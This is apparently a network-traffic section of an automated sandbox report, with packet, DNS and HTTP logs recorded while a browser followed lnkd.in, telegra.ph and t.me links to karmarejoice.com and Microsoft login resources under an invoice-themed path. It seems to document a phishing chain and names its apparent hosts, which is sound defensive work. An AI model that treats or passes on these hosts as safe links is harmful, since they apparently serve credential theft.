                                                                                                                                                                                                                            May 13, 2022 20:46:58.922465086 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922530890 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922560930 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922585964 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922604084 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922615051 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922641039 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922646046 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922667027 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:58.922693968 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004456997 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004506111 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004553080 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004570961 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004584074 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004602909 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:59.004631042 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:59.007110119 CEST49914443192.168.2.6103.53.43.226
                                                                                                                                                                                                                            May 13, 2022 20:46:59.007127047 CEST44349914103.53.43.226192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:00.993794918 CEST4434990150.87.150.0192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:00.993954897 CEST4434990150.87.150.0192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:00.994021893 CEST49901443192.168.2.650.87.150.0
                                                                                                                                                                                                                            May 13, 2022 20:47:02.919342995 CEST49901443192.168.2.650.87.150.0
                                                                                                                                                                                                                            May 13, 2022 20:47:02.919392109 CEST4434990150.87.150.0192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:02.919411898 CEST49901443192.168.2.650.87.150.0
                                                                                                                                                                                                                            May 13, 2022 20:47:02.919476032 CEST49901443192.168.2.650.87.150.0
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941195965 CEST49888443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941308022 CEST49889443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941644907 CEST4434988813.107.42.14192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941700935 CEST4434988813.107.42.14192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941785097 CEST49888443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941787958 CEST4434988913.107.42.14192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941864014 CEST4434988913.107.42.14192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941873074 CEST49888443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941891909 CEST49889443192.168.2.613.107.42.14
                                                                                                                                                                                                                            May 13, 2022 20:47:04.941956997 CEST49889443192.168.2.613.107.42.14
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            May 13, 2022 20:46:28.806106091 CEST4952053192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:28.827179909 CEST53495208.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.166058064 CEST5880153192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:43.173633099 CEST5902853192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:43.192193985 CEST6157153192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:43.194654942 CEST53590288.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.206382990 CEST53588018.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.211400032 CEST53615718.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:43.680187941 CEST4975453192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:43.698890924 CEST53497548.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.101772070 CEST6415053192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:44.120609045 CEST53641508.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:44.938965082 CEST5766953192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:44.967106104 CEST53576698.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:45.948156118 CEST6428953192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:45.967016935 CEST53642898.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.219752073 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.245620966 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.246157885 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.272006989 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.272073984 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.272124052 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.272146940 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.272625923 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.274266005 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.337606907 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.344244003 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.370721102 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.380002022 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.380048990 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.380064964 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.396912098 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.453315973 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.565483093 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.790612936 CEST44358565142.250.185.238192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:49.837176085 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.837735891 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.837850094 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.837932110 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:49.941947937 CEST58565443192.168.2.6142.250.185.238
                                                                                                                                                                                                                            May 13, 2022 20:46:53.621942997 CEST5045353192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:53.641455889 CEST53504538.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:54.351380110 CEST5574553192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.354353905 CEST6437553192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.356513977 CEST6384453192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.373785973 CEST53557458.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:54.386557102 CEST5164553192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.392817974 CEST6501053192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.394896984 CEST4928753192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:54.415445089 CEST53650108.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:54.417036057 CEST53492878.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:54.510963917 CEST53638448.8.8.8192.168.2.6
                                                                                                                                                                                                                            May 13, 2022 20:46:57.840689898 CEST5052053192.168.2.68.8.8.8
                                                                                                                                                                                                                            May 13, 2022 20:46:58.219372988 CEST53505208.8.8.8192.168.2.6
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                                            May 13, 2022 20:46:28.806106091 CEST192.168.2.68.8.8.80x9c6cStandard query (0)lnkd.inA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.166058064 CEST192.168.2.68.8.8.80x5bc9Standard query (0)clients2.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.173633099 CEST192.168.2.68.8.8.80x590Standard query (0)lnkd.inA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.192193985 CEST192.168.2.68.8.8.80xf93eStandard query (0)accounts.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.680187941 CEST192.168.2.68.8.8.80x6ff9Standard query (0)telegra.phA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:44.101772070 CEST192.168.2.68.8.8.80xfd1fStandard query (0)t.meA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:44.938965082 CEST192.168.2.68.8.8.80xa872Standard query (0)edit.telegra.phA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:45.948156118 CEST192.168.2.68.8.8.80x7496Standard query (0)telegra.phA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:53.621942997 CEST192.168.2.68.8.8.80x6f6aStandard query (0)karmarejoice.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.351380110 CEST192.168.2.68.8.8.80xe9b8Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.354353905 CEST192.168.2.68.8.8.80x8b3Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.356513977 CEST192.168.2.68.8.8.80x8e3aStandard query (0)dancevida.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.386557102 CEST192.168.2.68.8.8.80x8d66Standard query (0)code.jquery.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.392817974 CEST192.168.2.68.8.8.80xfe66Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.394896984 CEST192.168.2.68.8.8.80xafcaStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.840689898 CEST192.168.2.68.8.8.80xbce6Standard query (0)karmarejoice.comA (IP address)IN (0x0001)
                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                                            May 13, 2022 20:46:28.827179909 CEST8.8.8.8192.168.2.60x9c6cNo error (0)lnkd.in13.107.42.14A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.194654942 CEST8.8.8.8192.168.2.60x590No error (0)lnkd.in13.107.42.14A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.206382990 CEST8.8.8.8192.168.2.60x5bc9No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.206382990 CEST8.8.8.8192.168.2.60x5bc9No error (0)clients.l.google.com142.250.185.238A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.211400032 CEST8.8.8.8192.168.2.60xf93eNo error (0)accounts.google.com142.250.186.77A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:43.698890924 CEST8.8.8.8192.168.2.60x6ff9No error (0)telegra.ph149.154.164.13A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:44.120609045 CEST8.8.8.8192.168.2.60xfd1fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:44.967106104 CEST8.8.8.8192.168.2.60xa872No error (0)edit.telegra.ph149.154.164.13A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:45.967016935 CEST8.8.8.8192.168.2.60x7496No error (0)telegra.ph149.154.164.13A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:53.641455889 CEST8.8.8.8192.168.2.60x6f6aNo error (0)karmarejoice.com103.53.43.226A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.373785973 CEST8.8.8.8192.168.2.60xe9b8No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.373785973 CEST8.8.8.8192.168.2.60xe9b8No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.378117085 CEST8.8.8.8192.168.2.60x8b3No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.403650045 CEST8.8.8.8192.168.2.60x8d66No error (0)code.jquery.comcds.s5x3j6q5.hwcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.409063101 CEST8.8.8.8192.168.2.60x1bebNo error (0)cs1227.wpc.alphacdn.net192.229.221.185A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.415445089 CEST8.8.8.8192.168.2.60xfe66No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.415445089 CEST8.8.8.8192.168.2.60xfe66No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.416196108 CEST8.8.8.8192.168.2.60xa85dNo error (0)dual.part-0032.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.416196108 CEST8.8.8.8192.168.2.60xa85dNo error (0)dual.part-0032.t-0009.fbs1-t-msedge.netpart-0032.t-0009.fbs1-t-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.416196108 CEST8.8.8.8192.168.2.60xa85dNo error (0)part-0032.t-0009.fbs1-t-msedge.net13.107.219.60A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.416196108 CEST8.8.8.8192.168.2.60xa85dNo error (0)part-0032.t-0009.fbs1-t-msedge.net13.107.227.60A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.417036057 CEST8.8.8.8192.168.2.60xafcaNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.417036057 CEST8.8.8.8192.168.2.60xafcaNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:54.510963917 CEST8.8.8.8192.168.2.60x8e3aNo error (0)dancevida.com50.87.150.0A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.819745064 CEST8.8.8.8192.168.2.60x9af6No error (0)dual.part-0032.t-0009.t-msedge.netglobal-entry-afdthirdparty-fallback.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.819745064 CEST8.8.8.8192.168.2.60x9af6No error (0)dual.part-0032.t-0009.fbs1-t-msedge.netpart-0032.t-0009.fbs1-t-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.819745064 CEST8.8.8.8192.168.2.60x9af6No error (0)part-0032.t-0009.fbs1-t-msedge.net13.107.219.60A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.819745064 CEST8.8.8.8192.168.2.60x9af6No error (0)part-0032.t-0009.fbs1-t-msedge.net13.107.227.60A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:57.845309973 CEST8.8.8.8192.168.2.60x664aNo error (0)cs1227.wpc.alphacdn.net192.229.221.185A (IP address)IN (0x0001)
                                                                                                                                                                                                                            May 13, 2022 20:46:58.219372988 CEST8.8.8.8192.168.2.60xbce6No error (0)karmarejoice.com103.53.43.226A (IP address)IN (0x0001)
                                                                                                                                                                                                                            • accounts.google.com
                                                                                                                                                                                                                            • clients2.google.com
                                                                                                                                                                                                                            • lnkd.in
                                                                                                                                                                                                                            • telegra.ph
                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                              • edit.telegra.ph
                                                                                                                                                                                                                              • stackpath.bootstrapcdn.com
                                                                                                                                                                                                                              • cdnjs.cloudflare.com
                                                                                                                                                                                                                              • maxcdn.bootstrapcdn.com
                                                                                                                                                                                                                              • logincdn.msauth.net
                                                                                                                                                                                                                              • aadcdn.msauth.net
                                                                                                                                                                                                                              • dancevida.com
                                                                                                                                                                                                                              • karmarejoice.com
                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            0192.168.2.649848142.250.186.77443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC0OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                                                                                                                            Host: accounts.google.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                                                            Origin: https://www.google.com
                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC0OUTData Raw: 20
                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC3INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://www.google.com
                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:43 GMT
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-o5-dp6Y7AcX-Dty1OYkWBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                            Content-Security-Policy: script-src 'nonce-o5-dp6Y7AcX-Dty1OYkWBg' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport
                                                                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                            Server: ESF
                                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC5INData Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11["gaia.l.a.r",[]]
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            1192.168.2.649847142.250.185.238443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                                                                                                                            Host: clients2.google.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            X-Goog-Update-Interactivity: fg
                                                                                                                                                                                                                            X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                                                                                            X-Goog-Update-Updater: chromecrx-85.0.4183.121
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ggWMjUVVEFkxw79pWNrO3w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:43 GMT
                                                                                                                                                                                                                            Content-Type: text/xml; charset=UTF-8
                                                                                                                                                                                                                            X-Daynum: 5611
                                                                                                                                                                                                                            X-Daystart: 42403
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                            Server: GSE
                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC3INData Raw: 33 36 64 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 36 31 31 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 34 32 34 30 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                                                                                                                            Data Ascii: 36d<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5611" elapsed_seconds="42403"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC3INData Raw: 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 2e 63 72 78 22 20 66 70 3d 22 31 2e 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61
                                                                                                                                                                                                                            Data Ascii: mmhkkegccagdldgiimedpiccmgmieda.crx" fp="1.81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><a
                                                                                                                                                                                                                            2022-05-13 18:46:43 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            10192.168.2.649860149.154.167.99443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:44 UTC21OUTGET /_websync_?path=Past-Due-Invoice-05-13&hash=1c67ee9ce8dc79971f HTTP/1.1
